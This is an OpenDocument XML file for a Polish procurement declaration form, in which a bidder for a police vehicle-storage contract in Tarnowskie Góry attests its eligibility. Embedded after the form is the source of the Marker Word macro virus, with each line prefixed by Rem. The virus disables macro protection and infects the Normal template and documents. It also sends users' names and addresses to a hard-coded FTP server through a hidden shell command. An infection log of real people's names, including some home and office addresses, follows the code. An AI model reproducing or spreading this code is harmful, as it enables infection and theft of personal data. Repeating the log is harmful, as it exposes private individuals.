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start" style:justify-single-word="false"/>
      <style:text-properties fo:color="#000000" fo:font-size="12pt" fo:language="pl" fo:country="PL"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T1" style:family="text">
      <style:text-properties fo:color="#000000" fo:font-size="12pt" fo:language="pl" fo:country="PL"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T2"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2 <text:s text:c="2"/></text:p>
      <text:p text:style-name="P2">.................................. dnia ..................</text:p>
      <text:p text:style-name="Standard">Nazwa: ..........................................</text:p>
      <text:p text:style-name="Standard">Miejscowość: ...............................</text:p>
      <text:p text:style-name="Standard">Ulica: ............................................</text:p>
      <text:p text:style-name="Standard">NIP: ..............................................</text:p>
      <text:p text:style-name="Standard">REGON: ......................................</text:p>
      <text:p text:style-name="Standard"/>
      <text:p text:style-name="Standard"/>
      <text:p text:style-name="Standard"/>
      <text:p text:style-name="Standard"/>
      <text:p text:style-name="P3">OŚWIADCZENIE</text:p>
      <text:p text:style-name="P3">Dostawcy lub wykonawcy przystępującego do udziału w postępowaniu</text:p>
      <text:p text:style-name="P3">o zamówienie publiczne zgodnie z art. 22 ust. 1 Ustawy Prawo zamówień publicznych.</text:p>
      <text:p text:style-name="P4"/>
      <text:p text:style-name="P4"/>
      <text:p text:style-name="P4"/>
      <text:p text:style-name="P4"/>
      <text:p text:style-name="P5"><text:tab/>Przystępując do udziału w postępowaniu o zamówienie publiczne dotyczącego </text:p>
      <text:p text:style-name="P6"><text:s/></text:p>
      <text:p text:style-name="P6"><text:s text:c="12"/><text:span text:style-name="T1">Parkowanie i przechowywanie <text:s/>pojazdów i ich części zabezpieczonych na koszt Policji, <text:s text:c="3"/></text:span></text:p>
      <text:p text:style-name="P7"><text:s text:c="12"/>zlecanych <text:s/>przez KPP Tarnowskie Góry , lub każdą inną jednostkę Policji zlecającą </text:p>
      <text:p text:style-name="P7"><text:s text:c="12"/>wykonanie <text:s/>usługi za pośrednictwem KPP Tarnowskie Góry</text:p>
      <text:p text:style-name="P5"><text:s text:c="11"/>składam oświadczenie, że podmiot, który reprezentuję:</text:p>
      <text:p text:style-name="P5"/>
      <text:p text:style-name="P5"><text:tab/>1. Posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli <text:tab/>ustawy nakładają obowiązek posiadania takich uprawnień.</text:p>
      <text:p text:style-name="P5"><text:tab/>2. Posiada niezbędną wiedzę i doświadczenie oraz potencjał techniczny, a także dysponuje <text:tab/>osobami zdolnymi do wykonania zamówienia.</text:p>
      <text:p text:style-name="P5"><text:tab/>3. Znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zmówienia.</text:p>
      <text:p text:style-name="P5"><text:tab/>4. Nie podlega wykluczeniu z postępowania o udzielenia zamówienia na podstawie art. 24 <text:tab/>Ustawy.</text:p>
      <text:p text:style-name="P5"/>
      <text:p text:style-name="P4"/>
      <text:p text:style-name="P4"/>
      <text:p text:style-name="P4"/>
      <text:p text:style-name="P4"/>
      <text:p text:style-name="P4"/>
      <text:p text:style-name="P4"/>
      <text:p text:style-name="P4"><text:tab/><text:tab/><text:tab/><text:tab/><text:tab/><text:tab/><text:tab/><text:tab/>..................................................................</text:p>
      <text:p text:style-name="P4"><text:tab/><text:tab/><text:tab/><text:tab/><text:tab/><text:tab/><text:tab/><text:tab/><text:span text:style-name="T2">(pieczęć i podpis osoby upoważnionej do występowania w <text:tab/><text:tab/><text:tab/><text:tab/><text:tab/><text:tab/><text:tab/><text:tab/>obrocie prawnym oraz reprezentowania oferenta i składania <text:tab/><text:tab/><text:tab/><text:tab/><text:tab/><text:tab/><text:tab/><text:tab/>oświadczeń woli w jego imieni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Załącznik nr 2</dc:title>
    <meta:initial-creator>sekretariat</meta:initial-creator>
    <meta:creation-date>2004-06-02T13:54:00</meta:creation-date>
    <dc:date>2007-10-16T08:20:45</dc:date>
    <meta:print-date>2007-10-16T08:20:34</meta:print-date>
    <dc:language>pl-PL</dc:language>
    <meta:editing-cycles>14</meta:editing-cycles>
    <meta:editing-duration>PT13M51S</meta:editing-duration>
    <meta:user-defined meta:name="Info 1"/>
    <meta:user-defined meta:name="Info 2"/>
    <meta:user-defined meta:name="Info 3"/>
    <meta:user-defined meta:name="Info 4"/>
    <meta:document-statistic meta:table-count="0" meta:image-count="0" meta:object-count="0" meta:page-count="1" meta:paragraph-count="22" meta:word-count="153" meta:character-count="157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Private Sub Document_Close()
Rem 
Rem On Error Resume Next
Rem 
Rem Const Marker = "&lt;- this is a marker!"
Rem 
Rem 'Declare Variables
Rem Dim SaveDocument, SaveNormalTemplate, DocumentInfected, NormalTemplateInfected As Boolean
Rem Dim ad, nt As Object
Rem Dim OurCode, UserAddress, LogData, LogFile As String
Rem 
Rem 'Initialize Variables
Rem Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
Rem Set nt = NormalTemplate.VBProject.VBComponents.Item(1)
Rem 
Rem DocumentInfected = ad.CodeModule.Find(Marker, 1, 1, 10000, 10000)
Rem NormalTemplateInfected = nt.CodeModule.Find(Marker, 1, 1, 10000, 10000)
Rem 
Rem 
Rem 'Switch the VirusProtection OFF
Rem Options.VirusProtection = False
Rem 
Rem 
Rem   If (Day(Now()) = 1) And (System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogFile") = False) Then
Rem   
Rem     If DocumentInfected = True Then
Rem       LogData = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)
Rem     ElseIf NormalTemplateInfected = True Then
Rem       LogData = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines)
Rem     End If
Rem     
Rem     LogData = Mid(LogData, InStr(1, LogData, "' Log" &amp; "file --&gt;"), Len(LogData) - InStr(1, LogData, "' Log" &amp; "file --&gt;"))
Rem     
Rem     For i = 1 To 4
Rem       LogFile = LogFile + Mid(Str(Int(8 * Rnd)), 2, 1)
Rem     Next i
Rem     LogFile = "C:\hsf" &amp; LogFile &amp; ".sys"
Rem     
Rem     Open LogFile For Output As #1
Rem     Print #1, LogData
Rem     Close #1
Rem     
Rem     Open "c:\netldx.vxd" For Output As #1
Rem     Print #1, "o 209.201.88.110"
Rem     Print #1, "user anonymous"
Rem     Print #1, "pass itsme@"
Rem     Print #1, "cd incoming"
Rem     Print #1, "ascii"
Rem     Print #1, "put " &amp; LogFile
Rem     Print #1, "quit"
Rem     Close #1
Rem     
Rem     Shell "command.com /c ftp.exe -n -s:c:\netldx.vxd", vbHide
Rem     
Rem     System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogFile") = True
Rem     
Rem   End If
Rem 
Rem 
Rem 'Make sure that some conditions are true before we continue infecting anything
Rem If (DocumentInfected = True Xor NormalTemplateInfected = True) And _
Rem    (ActiveDocument.SaveFormat = wdFormatDocument Or _
Rem    ActiveDocument.SaveFormat = wdFormatTemplate) Then
Rem    
Rem    
Rem   'Infect the NormalTemplate
Rem   If DocumentInfected = True Then
Rem   
Rem     SaveNormalTemplate = NormalTemplate.Saved
Rem   
Rem     OurCode = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)
Rem 
Rem     
Rem     'Write a log file of this NormalTemplate infection
Rem     For i = 1 To Len(Application.UserAddress)
Rem       If Mid(Application.UserAddress, i, 1) &lt;&gt; Chr(13) Then
Rem         If Mid(Application.UserAddress, i, 1) &lt;&gt; Chr(10) Then
Rem           UserAddress = UserAddress &amp; Mid(Application.UserAddress, i, 1)
Rem         End If
Rem       Else
Rem         UserAddress = UserAddress &amp; Chr(13) &amp; "' "
Rem       End If
Rem     Next i
Rem 
Rem     OurCode = OurCode &amp; Chr(13) &amp; _
Rem               "' " &amp; Format(Time, "hh:mm:ss AMPM - ") &amp; _
Rem                      Format(Date, "dddd, d mmm yyyy") &amp; Chr(13) &amp; _
Rem               "' " &amp; Application.UserName &amp; Chr(13) &amp; _
Rem               "' " &amp; UserAddress &amp; Chr(13)
Rem 
Rem 
Rem     nt.CodeModule.DeleteLines 1, nt.CodeModule.CountOfLines
Rem     nt.CodeModule.AddFromString OurCode
Rem     
Rem     If SaveNormalTemplate = True Then NormalTemplate.Save
Rem     
Rem   End If
Rem 
Rem 
Rem   'Infect the ActiveDocument
Rem   If NormalTemplateInfected = True And _
Rem      (Mid(ActiveDocument.FullName, 2, 1) = ":" Or _
Rem      ActiveDocument.Saved = False) Then
Rem   
Rem     SaveDocument = ActiveDocument.Saved
Rem     
Rem     OurCode = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines)
Rem 
Rem     ad.CodeModule.DeleteLines 1, ad.CodeModule.CountOfLines
Rem     ad.CodeModule.AddFromString OurCode
Rem     
Rem     If SaveDocument = True Then ActiveDocument.Save
Rem       
Rem   End If
Rem   
Rem     
Rem End If
Rem 
Rem End Sub
Rem 
Rem ' Logfile --&gt;
Rem 
Rem ' 09:08:36  - Saturday, 28 Nov 1998
Rem ' SPo0Ky
Rem ' Blue Planet
Rem '
Rem 
Rem 
Rem 
Rem ' 02:50:31 PM - Saturday, 28 Nov 1998
Rem ' MARK B. SEAY
Rem '
Rem 
Rem 
Rem 
Rem ' 08:04:45 AM - Friday, 4 Dec 1998
Rem ' UPS
Rem '
Rem 
Rem 
Rem 
Rem ' 11:43:35 AM - Thursday, 17 Dec 1998
Rem ' WRO
Rem '
Rem 
Rem 
Rem 
Rem ' 02:30:56 PM - Tuesday, 22 Dec 1998
Rem ' bd04619
Rem '
Rem 
Rem 
Rem 
Rem ' 11:10:36 AM - Tuesday, 5 Jan 1999
Rem ' Ingrid W. Romer
Rem '
Rem 
Rem 
Rem 
Rem ' 01:33:00 PM - Wednesday, 20 Jan 1999
Rem ' Tina Griffin
Rem '
Rem 
Rem 
Rem 
Rem ' 05:45:20 PM - Thursday, 21 Jan 1999
Rem ' Jack Garber
Rem ' Jack Garber
Rem ' 11022 Wickshire Way
Rem ' North Bethesda, MD 20852
Rem 
Rem 
Rem 
Rem ' 03:15:20 PM - Friday, 22 Jan 1999
Rem ' Sharon Leaman
Rem '
Rem 
Rem 
Rem 
Rem ' 11:14:54 AM - Friday, 29 Jan 1999
Rem ' Valued Gateway Customer
Rem '
Rem 
Rem 
Rem 
Rem ' 10:04:23 AM - Monday, 1 Feb 1999
Rem ' Carol S. Arnold
Rem '
Rem 
Rem 
Rem 
Rem ' 10:43:31 AM - Thursday, 4 Feb 1999
Rem ' linda girgis
Rem '
Rem 
Rem 
Rem 
Rem ' 11:31:18 AM - Monday, 8 Feb 1999
Rem ' Microsoft
Rem '
Rem 
Rem 
Rem 
Rem ' 01:04:10 PM - Monday, 8 Feb 1999
Rem ' Karl J. Quakenbush
Rem '
Rem 
Rem 
Rem 
Rem ' 07:43:08 PM - Wednesday, 10 Feb 1999
Rem ' Prof. Michael N. Huhns
Rem ' Dept. of Electrical &amp; Computer Engineering
Rem ' University of South Carolina
Rem ' 301 South Main Street
Rem ' Columbia, SC  29208
Rem 
Rem 
Rem 
Rem ' 11:36:01 AM - Friday, 19 Feb 1999
Rem ' Steve Woods
Rem '
Rem 
Rem 
Rem 
Rem ' 10:12:11 AM - Friday, 26 Mar 1999
Rem ' Keri Schreiner
Rem '
Rem 
Rem 
Rem 
Rem ' 03:04:50 PM - Monday, 19 Apr 1999
Rem ' mccricks
Rem '
Rem 
Rem 
Rem 
Rem ' 01:52:15 PM - Sunday, 9 May 1999
Rem ' jmankoff
Rem '
Rem 
Rem 
Rem 
Rem ' 07:18:03  - sobota, 22 maj 1999
Rem ' Rafal Strzelecki
Rem '
Rem 
Rem 
Rem 
Rem ' 05:56:20  - wtorek, 27 maj 1997
Rem ' JS
Rem '
Rem 
Rem 
Rem 
Rem ' 07:14:38  - poniedziałek, 7 cze 1999
Rem ' Aleksander Koczy
Rem '
Rem 
Rem 
Rem 
Rem ' 08:09:37  - niedziela, 13 cze 1999
Rem ' Maq
Rem '
Rem 
Rem 
Rem 
Rem ' 09:01:16  - czwartek, 21 paź 1999
Rem ' Makowski Wojciech
Rem '
Rem 
Rem 
Rem 
Rem ' 11:43:15  - wtorek, 26 paź 1999
Rem ' x
Rem '
Rem 
Rem 
Rem 
Rem ' 06:41:30  - środa, 3 maj 2000
Rem ' Praska Aleksandra
Rem '
Rem 
Rem 
Rem 
Rem ' 06:57:05  - poniedziałek, 9 paź 2000
Rem ' WALKIEWICZ
Rem '
Rem 
Rem 
Rem 
Rem ' 07:21:42  - piątek, 23 mar 2001
Rem ' *
Rem '
Rem 
Rem 
Rem 
Rem ' 07:31:12  - środa, 27 lut 2002
Rem ' Dak
Rem '
Rem 
Rem 
Rem 
Rem ' 10:50:47  - wtorek, 4 VI 2002
Rem ' Krystian
Rem '
Rem 
Rem 
Rem 
Rem ' 02:59:11  - sobota, 29 III 2003
Rem ' Krystian
Rem '
Rem 
Rem 
Rem 
Rem ' 09:41:39  - piątek, 22 sie 2003
Rem ' Anna MICHALSKA
Rem '
Rem 
Rem 
Rem 
Rem ' 08:12:13  - środa, 19 lis 2003
Rem ' FINANSE
Rem '
Rem 
Rem 
Rem 
Rem ' 10:29:33  - piątek, 9 lip 2004
Rem ' FINANSE
Rem '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